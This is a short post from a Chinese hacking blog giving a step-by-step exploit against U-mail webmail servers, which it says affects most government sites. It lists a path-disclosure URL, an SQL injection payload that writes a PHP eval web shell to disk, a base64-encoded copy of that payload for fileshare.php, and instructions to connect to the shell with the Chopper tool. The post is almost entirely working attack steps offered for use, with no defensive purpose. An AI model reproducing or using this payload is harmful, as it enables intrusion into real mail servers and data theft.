记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

大部分网站政府网站U-mail存在直接拿shell漏洞

2014-03-12 13:00

大部分网站政府网站U-mail存在直接拿shell漏洞

加入
webmail/userapply.php?execadd=333&DomainID=111
直接爆出物理地址
然后将
 
aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/WorldClient/html/saknc.php'#
 
用base64编译一下
 
YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1QxKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRDovdW1haWwvV29ybGRDbGllbnQvaHRtbC9zYWtuYy5waHAnIw==
 
然后
 
网站.com/webmail/fileshare.php?file=加上上面编译的base64代码
可直接写入shell saknc.php
用菜刀连接
 
http://127.0.0.1/webmail/saknc.php
密码:shell
 

 


知识来源: www.hackqing.com/index.asp?FoxNews=1185.html

阅读:111797 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“大部分网站政府网站U-mail存在直接拿shell漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云